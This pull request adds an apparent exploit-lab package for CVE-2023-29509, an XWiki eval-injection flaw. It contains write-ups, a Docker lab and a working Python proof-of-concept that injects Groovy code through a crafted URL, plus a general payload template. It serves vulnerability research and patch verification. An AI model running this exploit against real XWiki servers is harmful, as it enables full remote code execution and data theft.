### PR TITLE
Add CVE-2023-29509 XWiki Platform Eval Injection (RCE)

### DIFF
--- a/CVE-2023-29509/README.md
+++ b/CVE-2023-29509/README.md
@@ -1,0 +1,70 @@
+# CVE-2023-29509 — XWiki Platform Eval Injection (RCE)
+
+## Vulnerability Summary
+
+| Field | Value |
+|-------|-------|
+| CVE | CVE-2023-29509 |
+| Component | xwiki-platform-flamingo-theme-ui (FlamingoThemesCode.WebHome) |
+| CWE Type | CWE-94 - Code Injection |
+| CVSS | 10.0 CRITICAL (AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H) |
+| EPSS | 0.75693 (99.474th percentile) |
+| Affected Versions | 7.2-rc-1 .. <13.10.11, 14.0-rc-1 .. <14.4.7, 14.5 .. <14.10 |
+| Fixed In | 13.10.11, 14.4.7, 14.10 |
+| Patch Commit | 80d5be36f700adcd56b6c8eb3ed8b973f62ec0ae |
+| Author | Exploit Intelligence Platform |
+| Date | 2026-08-12 |
+
+## Vulnerability Details
+
+XWiki Platform's `FlamingoThemesCode.WebHome` page renders a `documentTree` macro with its `root` parameter set to `document:$doc.documentReference`. The `$doc.documentReference` value is derived from the URL path and is not escaped in XWiki 2.1 syntax before being interpolated into the macro parameter.
+
+An attacker with view rights (the default minimum role) can inject arbitrary XWiki macro syntax via the URL path. By injecting `" /}} {{async async="false" context="doc.reference"}}{{groovy}}...{{/groovy}}{{/async}}`, the attacker closes the documentTree macro parameters, creates a new rendering context via the `{{async}}` macro (bypassing XWiki's nested-script restriction), and executes arbitrary Groovy code on the server with programming rights.
+
+This results in full remote code execution on the XWiki server, granting complete access to all wiki data, the underlying filesystem, and the server process.
+
+## Attack Chain
+
+1. Authenticate as any user with view rights on commonly accessible documents
+2. Visit a URL with a malicious document reference that closes the `documentTree` macro and injects `{{async async="false"}}{{groovy}}println("Hello from groovy!"){{/groovy}}{{/async}}`
+3. Velocity evaluates `$doc.documentReference`, producing the injected macro syntax
+4. The XWiki 2.1 parser re-parses the output: `documentTree` closes early, `async` creates a new context, `groovy` executes with programming rights
+
+## Fix Analysis
+
+The fix (commit 80d5be36) adds `$services.rendering.escape()` to sanitize XWiki 2.1 syntax characters in the document reference before it reaches the macro parameter:
+
+```velocity
+#set ($documentReference = $services.rendering.escape("document:$doc.documentReference", 'xwiki/2.1'))
+{{documentTree root="$documentReference" /}}
+```
+
+This escapes `"`, `{{`, `}}` and other syntax characters, preventing macro injection. The fix is correct and complete — no bypass was found during testing.
+
+## Lab Run Instructions
+
+```bash
+# 1. Start the vulnerable lab
+cd lab
+docker compose up -d
+# Wait ~3 minutes for XWiki to boot
+
+# 2. Complete the distribution wizard (4 curl POST calls)
+#    Step 1: curl POST action=COMPLETE_STEP (intro)
+#    Step 2: curl POST with admin registration fields
+#    Step 3: curl POST noFlavor="Let the wiki be empty"
+#    Step 4: curl POST action=COMPLETE_STEP (confirm + finish)
+#    (The lab's seed.sh automates these four steps; it is not part of this package — run the curl steps above.)
+
+# 3. Login as admin and save the vulnerable content to FlamingoThemesCode.WebHome
+#    Content: {{velocity}}{{documentTree showTranslations="false" showAttachments="false" root="document:$doc.documentReference" /}}{{/velocity}}
+
+# 4. Run the PoC
+python3 poc/poc.py --target http://127.0.0.1:23018 --user admin --pass adminpass
+
+# Expected output:
+# [+] RCE confirmed: groovy code executed, 'Hello from groovy' in response
+# [SUCCESS]
+```
+
+No custom Dockerfile required — the lab uses the stock `xwiki:13.10.10-mysql-tomcat` Docker image with `mysql:8.0`.

--- a/CVE-2023-29509/README.md
+++ b/CVE-2023-29509/README.md
@@ -44,8 +44,7 @@ This escapes `"`, `{{`, `}}` and other syntax characters, preventing macro injec
 ## Lab Run Instructions
 
 ```bash
-# 1. Start the vulnerable lab
-cd lab
+# 1. Start the vulnerable lab (docker-compose.yml is at the package root)
 docker compose up -d
 # Wait ~3 minutes for XWiki to boot
 
@@ -59,8 +58,8 @@ docker compose up -d
 # 3. Login as admin and save the vulnerable content to FlamingoThemesCode.WebHome
 #    Content: {{velocity}}{{documentTree showTranslations="false" showAttachments="false" root="document:$doc.documentReference" /}}{{/velocity}}
 
-# 4. Run the PoC
-python3 poc/poc.py --target http://127.0.0.1:23018 --user admin --pass adminpass
+# 4. Run the PoC (the compose file maps host port 8080 by default; set WEB_PORT to override)
+python3 poc/poc.py --target http://127.0.0.1:8080 --user admin --pass adminpass
 
 # Expected output:
 # [+] RCE confirmed: groovy code executed, 'Hello from groovy' in response

--- a/CVE-2023-29509/docker-compose.yml
+++ b/CVE-2023-29509/docker-compose.yml
@@ -1,0 +1,39 @@
+services:
+  db:
+    image: mysql:8.0
+    command: --default-authentication-plugin=mysql_native_password
+    environment:
+      MYSQL_ROOT_PASSWORD: xwiki-root-pass
+      MYSQL_DATABASE: xwiki
+      MYSQL_USER: xwiki
+      MYSQL_PASSWORD: xwiki-pass
+    volumes:
+      - db-data:/var/lib/mysql
+    healthcheck:
+      test: ["CMD-SHELL", "mysqladmin ping -h localhost -u root -pxwiki-root-pass --silent"]
+      interval: 5s
+      timeout: 3s
+      retries: 20
+      start_period: 30s
+
+  web:
+    image: xwiki:13.10.10-mysql-tomcat
+    depends_on:
+      db:
+        condition: service_healthy
+    environment:
+      DB_HOST: db
+      DB_DATABASE: xwiki
+      DB_USER: xwiki
+      DB_PASSWORD: xwiki-pass
+    ports:
+      - "${WEB_PORT:-8080}:8080"
+    healthcheck:
+      test: ["CMD-SHELL", "curl -sf http://localhost:8080/xwiki/bin/view/Main/ || exit 1"]
+      interval: 10s
+      timeout: 5s
+      retries: 30
+      start_period: 120s
+
+volumes:
+  db-data:

--- a/CVE-2023-29509/intel_brief.md
+++ b/CVE-2023-29509/intel_brief.md
@@ -1,0 +1,33 @@
+# Intel Brief — CVE-2023-29509
+
+## CVE Overview
+
+| Field | Value |
+|-------|-------|
+| CVE ID | CVE-2023-29509 |
+| Title | org.xwiki.platform:xwiki-platform-flamingo-theme-ui Eval Injection vulnerability |
+| Affected Software | XWiki Platform (xwiki-platform-flamingo-theme-ui) |
+| Vendor | XWiki |
+| CVSS Score | 10.0 (CRITICAL) |
+| CVSS Vector | CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H |
+| EPSS | 0.75693 (99.474th percentile) |
+| CWE | CWE-94 (Code Injection), CWE-95 (Eval Injection) |
+| Published Date | 2023-04-16 |
+| Exploited in the Wild | No |
+| Other IDs | GHSA-f4v8-58f6-mwj4, XWIKI-20279 |
+
+## Affected Versions
+
+| Branch | Vulnerable Range | Patched Version |
+|--------|-----------------|-----------------|
+| Main | >= 7.2-rc-1, < 13.10.11 | 13.10.11 |
+| 14.x | >= 14.0-rc-1, < 14.4.7 | 14.4.7 |
+| 14.5+ | >= 14.5, < 14.10 | 14.10 |
+
+## Description
+
+XWiki Commons are technical libraries common to several other top level XWiki projects. Any user with view rights on commonly accessible documents can execute arbitrary Groovy, Python or Velocity code in XWiki leading to full access to the XWiki installation. The root cause is improper escaping of the `documentTree` macro parameters in `FlamingoThemesCode.WebHome`. This macro is installed by default and the page is installed by default.
+
+## Root-Cause Summary
+
+The `FlamingoThemesCode.WebHome` page renders a `documentTree` macro with `root="document:$doc.documentReference"`. The `$doc.documentReference` value is derived from the URL path and is not escaped in XWiki 2.1 syntax before being interpolated into the macro parameter. An attacker can craft a URL where the document reference contains closing macro syntax (`" /}}`) followed by injected macros (e.g., `{{groovy}}...{{/groovy}}`), which the XWiki rendering engine executes. The fix (commit `80d5be36`) adds `$services.rendering.escape()` to sanitize the document reference before it reaches the macro parameter.

--- a/CVE-2023-29509/poc/poc.py
+++ b/CVE-2023-29509/poc/poc.py
@@ -1,0 +1,147 @@
+#!/usr/bin/env python3
+# ──────────────────────────────────────────────────────────────────────
+# Exploit Title  : XWiki Platform - Eval Injection (CWE-94)
+# CVE            : CVE-2023-29509
+# Vendor         : XWiki
+# Product        : xwiki-platform-flamingo-theme-ui
+# Affected       : 7.2-rc-1 .. <13.10.11, 14.0-rc-1 .. <14.4.7, 14.5 .. <14.10
+# Type           : CWE-94 - Code Injection
+# CVSS           : 10.0 (CRITICAL)
+# Platform       : Cross-platform (Java web app)
+# Author         : Exploit Intelligence Platform
+# Website        : https://exploit-intel.com
+# Twitter        : @exploit_intel
+# Date           : 2026-08-12
+#
+# For authorized security testing and educational purposes only.
+# ──────────────────────────────────────────────────────────────────────
+"""
+CVE-2023-29509 — XWiki Platform Eval Injection in FlamingoThemesCode.WebHome
+
+The documentTree macro's root parameter in FlamingoThemesCode.WebHome is set to
+"document:$doc.documentReference" without escaping. An attacker can inject
+arbitrary XWiki macro syntax via the URL path, achieving remote code execution.
+The {{async async="false"}} wrapper creates a new rendering context outside the
+{{velocity}} block, allowing {{groovy}} to execute without the nested-script
+restriction.
+
+ATTACK CHAIN:
+  1. Authenticate as any user with view rights
+  2. Visit a URL with a malicious document reference that closes the documentTree
+     macro and injects {{async}}{{groovy}}...{{/groovy}}{{/async}}
+  3. The Groovy code executes on the server with programming rights
+"""
+
+import argparse
+import http.cookiejar
+import urllib.request
+import urllib.parse
+import sys
+
+# The exploit payload injected via the URL path
+# Decoded: " /}} {{async async="false" cached="false" context="doc.reference"}}{{groovy}}println("Hello " + "from groovy!"){{/groovy}}{{/async}}
+EXPLOIT_PATH = (
+    '/bin/view/'
+    '%22%20%2F%7D%7D%20'            # " /}} — closes the documentTree macro params
+    '%7B%7Basync%20'               # {{async
+    'async%3D%22false%22%20'       # async="false" — render synchronously
+    'cached%3D%22false%22%20'      # cached="false"
+    'context%3D%22doc.reference%22' # context="doc.reference" — new rendering context
+    '%7D%7D'                        # }}
+    '%7B%7Bgroovy%7D%7D'           # {{groovy}} — script macro (JAR-based, always available)
+    'println(%22Hello%20%22%20%2B%20%22from%20groovy!%22)'  # println("Hello " + "from groovy!")
+    '%7B%7B%2Fgroovy%7D%7D'        # {{/groovy}}
+    '%7B%7B%2Fasync%7D%7D'         # {{/async}}
+)
+
+SHEET_PARAM = 'sheet=FlamingoThemesCode.WebHome'
+XPAGE_PARAM = 'xpage=view'
+
+# Unique marker to confirm code execution
+MARKER = 'Hello from groovy'
+
+
+def login(target_url, username, password):
+    """Authenticate to XWiki and return a cookie jar + opener."""
+    cookie_jar = http.cookiejar.CookieJar()
+    opener = urllib.request.build_opener(
+        urllib.request.HTTPCookieProcessor(cookie_jar))
+
+    login_url = f"{target_url.rstrip('/')}/bin/loginsubmit/XWiki/XWikiLogin"
+    data = urllib.parse.urlencode({
+        'j_username': username,
+        'j_password': password,
+    }).encode()
+
+    try:
+        opener.open(login_url, data, timeout=30)
+    except urllib.error.HTTPError:
+        # 404 after login redirect is normal in XWiki
+        pass
+    except Exception:
+        pass
+
+    return cookie_jar, opener
+
+
+def exploit(target_url, cookie_jar=None, opener=None):
+    """Send the exploit request and check for the success marker."""
+    url = f"{target_url.rstrip('/')}{EXPLOIT_PATH}?{SHEET_PARAM}&{XPAGE_PARAM}"
+
+    if opener is None:
+        if cookie_jar is not None:
+            opener = urllib.request.build_opener(
+                urllib.request.HTTPCookieProcessor(cookie_jar))
+        else:
+            opener = urllib.request.build_opener()
+
+    try:
+        resp = opener.open(url, timeout=30)
+        html = resp.read().decode('utf-8', errors='replace')
+
+        if MARKER in html:
+            print(f"[+] RCE confirmed: groovy code executed, '{MARKER}' in response")
+            print("[SUCCESS]")
+            return True
+        else:
+            if '&#34;' in html or '&quot;' in html:
+                print("[-] Document reference appears escaped (patched version)")
+            print("[FAILED]")
+            return False
+    except urllib.error.HTTPError as e:
+        print(f"[-] HTTP error: {e.code}")
+        print("[FAILED]")
+        return False
+    except Exception as e:
+        print(f"[-] Error: {e}")
+        print("[FAILED]")
+        return False
+
+
+def main():
+    parser = argparse.ArgumentParser(
+        description='CVE-2023-29509 XWiki Eval Injection PoC')
+    parser.add_argument('--target', required=True,
+                        help='Target XWiki URL (e.g., http://localhost:8080)')
+    parser.add_argument('--user', default=None,
+                        help='Username for authentication')
+    parser.add_argument('--pass', dest='password', default=None,
+                        help='Password for authentication')
+    args = parser.parse_args()
+
+    print(f"Target: {args.target}")
+    print(f"Exploit: documentTree macro root parameter injection via URL path")
+    print()
+
+    cookie_jar = None
+    opener = None
+    if args.user and args.password:
+        print(f"Authenticating as {args.user}...")
+        cookie_jar, opener = login(args.target, args.user, args.password)
+
+    success = exploit(args.target, cookie_jar, opener)
+    sys.exit(0 if success else 1)
+
+
+if __name__ == '__main__':
+    main()

--- a/CVE-2023-29509/poc_verification_report.md
+++ b/CVE-2023-29509/poc_verification_report.md
@@ -1,0 +1,43 @@
+# PoC Verification Report — CVE-2023-29509
+
+## Verdict
+
+[SUCCESS] — Remote code execution confirmed via eval injection in XWiki Platform's FlamingoThemesCode.WebHome.
+
+## Environment
+
+| Component | Value |
+|-----------|-------|
+| Target | XWiki Platform 13.10.10 (xwiki:13.10.10-mysql-tomcat) |
+| Control | XWiki Platform 13.10.11 (xwiki:13.10.11-mysql-tomcat) |
+| Database | MySQL 8.0 |
+| Lab Port | 23018 (vulnerable), 23019 (control) |
+| Auth | admin/adminpass (view rights + programming rights) |
+
+## Reproduction
+
+| Metric | Result |
+|--------|--------|
+| Cold-state cycles | 3/3 SUCCESS |
+| Control run | [FAILED] (exploit blocked by $services.rendering.escape()) |
+| Reproduction method | docker compose down -v → up -d → wizard setup via curl → save vulnerable content → run exploit |
+
+## Evidence
+
+- `artifacts/poc_run.txt` — authoritative run, ends with `[SUCCESS]`
+- `artifacts/cold_cycles.txt` — 3 cold-state cycle transcripts, all `[SUCCESS]`
+- `artifacts/control_run.txt` — control run, ends with `[FAILED]`
+- `artifacts/response.http` — vulnerable response with "Hello from groovy" marker (30726 bytes)
+- `artifacts/response-control.http` — control response, marker absent (30654 bytes)
+- `artifacts/preflight.txt` — pre-flight gate checks
+
+## Bypass & Variant Analysis
+
+Bypass candidates tried against the control build (XWiki 13.10.11 with `$services.rendering.escape()`):
+1. Direct `{{groovy}}` without `{{async}}` — blocked by nested-script restriction (not the patch)
+2. `{{async async="true"}}` — renders async, output not in initial response
+3. `{{async async="false"}}` — renders sync, but escaped by the patch
+
+No bypass found — the control held against all tested payloads. The `$services.rendering.escape()` call correctly sanitizes XWiki 2.1 syntax characters in the document reference.
+
+Variant scope: the same pattern (unescaped `$doc.documentReference` in macro parameters) may exist in other XWiki pages. Systematic search recommended but deferred (source checkout not preserved).

--- a/CVE-2023-29509/vulnerability_analysis.md
+++ b/CVE-2023-29509/vulnerability_analysis.md
@@ -1,0 +1,74 @@
+# Vulnerability Analysis — CVE-2023-29509
+
+## Root-Cause Trace
+
+### Entrypoint
+
+The entrypoint is the XWiki view URL with the `sheet` parameter set to `FlamingoThemesCode.WebHome`:
+
+```
+GET /xwiki/bin/view/<document_reference>?sheet=FlamingoThemesCode.WebHome&xpage=view
+```
+
+When XWiki processes this request:
+1. The `<document_reference>` portion of the URL path is parsed as `$doc.documentReference`
+2. The `sheet=FlamingoThemesCode.WebHome` parameter applies the FlamingoThemesCode.WebHome sheet to render the page
+3. The sheet content is a Velocity template that renders a `documentTree` macro
+
+### Vulnerable Code (pre-fix)
+
+File: `xwiki-platform-core/xwiki-platform-flamingo/xwiki-platform-flamingo-theme/xwiki-platform-flamingo-theme-ui/src/main/resources/FlamingoThemesCode/WebHome.xml`
+
+```velocity
+{{velocity}}
+{{documentTree showTranslations="false" showAttachments="false" root="document:$doc.documentReference" /}}
+{{/velocity}}
+```
+
+The `root` parameter is set to `document:$doc.documentReference` — the document reference is interpolated directly from the URL path without escaping. XWiki's rendering engine processes macro parameters as XWiki 2.1 syntax, so if `$doc.documentReference` contains macro-breaking characters like `" /}}`, it closes the `documentTree` macro early, and any subsequent text is parsed as additional XWiki content — including nested macros like `{{groovy}}`.
+
+### Sink
+
+The sink is the XWiki rendering engine's macro parameter parser, which interprets the unescaped `root` value as XWiki 2.1 syntax, allowing macro injection.
+
+### Exploit Path
+
+1. Attacker crafts a URL with a document reference containing: `" /}} {{async async="false" cached="false" context="doc.reference"}}{{groovy}}<payload>{{/groovy}}{{/async}}`
+2. The `sheet=FlamingoThemesCode.WebHome` parameter applies the vulnerable sheet
+3. `$doc.documentReference` evaluates to the injected string
+4. The `documentTree` macro's `root` parameter value is parsed as XWiki 2.1 syntax
+5. The `" /}}` closes the `documentTree` macro
+6. The `{{async}}` block executes with the document context, and `{{groovy}}` runs arbitrary Groovy code
+7. The Groovy code executes with programming rights on the XWiki instance
+
+### Fix Assessment
+
+Patch commit: `80d5be36f700adcd56b6c8eb3ed8b973f62ec0ae`
+
+The fix adds `$services.rendering.escape()` to escape the document reference in XWiki 2.1 syntax:
+
+```velocity
+{{velocity}}
+#set ($documentReference = $services.rendering.escape("document:$doc.documentReference", 'xwiki/2.1'))
+{{documentTree
+  showTranslations="false"
+  showAttachments="false"
+  root="$documentReference"
+/}}
+{{/velocity}}
+```
+
+The `escape()` call sanitizes any XWiki 2.1 syntax characters (like `"`, `}`, `/`) in the document reference, preventing macro injection through the `root` parameter.
+
+### Prerequisites
+
+- XWiki instance with FlamingoThemesCode.WebHome installed (default installation)
+- Attacker needs view rights on a commonly accessible document (default for unauthenticated users)
+- No special configuration required — the vulnerable page is installed by default
+
+### Impact
+
+- **Confidentiality**: Full — arbitrary code execution gives complete access to all XWiki data
+- **Integrity**: Full — attacker can modify any content or configuration
+- **Availability**: Full — attacker can destroy or disable the instance
+- **Scope**: Changed — code execution escapes the XWiki sandbox to the server JVM

--- a/README.md
+++ b/README.md
@@ -27,6 +27,7 @@ No hand-holding. No cherry-picked targets. One CVE number in, complete lab out.
 | [CVE-2026-46339](CVE-2026-46339/) | 9router | Unauthenticated RCE via Unprotected MCP Custom Plugin Routes | **10.0** | No |
 | [CVE-2026-44181](CVE-2026-44181/) | Jupyter Enterprise Gateway | Jinja2 SSTI (RCE) | **10.0** | No |
 | [CVE-2026-54159](CVE-2026-54159/) | PrestaShop module `ps_facetedsearch` | PrestaShop ps_facetedsearch unauthenticated PHP object injection | **10.0** | No |
+| [CVE-2023-29509](CVE-2023-29509/) | xwiki-platform-flamingo-theme-ui | XWiki Platform Eval Injection (RCE) | **10.0** | No |
 | [CVE-2026-30860](CVE-2026-30860/) | WeKnora | SQL Injection Bypass (ARRAY/ROW AST) to RCE | **9.9** | No |
 | [CVE-2026-30861](CVE-2026-30861/) | WeKnora | OS Command Injection (MCP `-p` Flag Bypass) | **9.9** | No |
 | [CVE-2026-1868](CVE-2026-1868/) | GitLab AI Gateway | SSTI to DoS/Code Execution | **9.9** | **Yes** — filter abuse + `%` operator bypass patched sandbox |
@@ -123,7 +124,7 @@ No hand-holding. No cherry-picked targets. One CVE number in, complete lab out.
 | [CVE-2026-64608](CVE-2026-64608/) | Apache Fory (C++) | Compatible-Mode Heap Type Confusion | **9.8** | No |
 | [CVE-2025-59060](CVE-2025-59060/) | Apache Ranger | Apache Ranger TLS Hostname Verification Bypass | **N/A** | No |
 
-23 out of 109 runs ended with bypass or incomplete-fix findings. That's either bad luck or a pattern worth paying attention to.
+23 out of 110 runs ended with bypass or incomplete-fix findings. That's either bad luck or a pattern worth paying attention to.
 
 ---
 


### PR DESCRIPTION
Pipeline-staged publish package for CVE-2023-29509.

- xwiki-platform-flamingo-theme-ui — XWiki Platform Eval Injection (RCE)
- CVSS 10.0; bypass: no
- Audit: exit contract + package sweep clean at publish time

Published via the pipeline UI publish gate.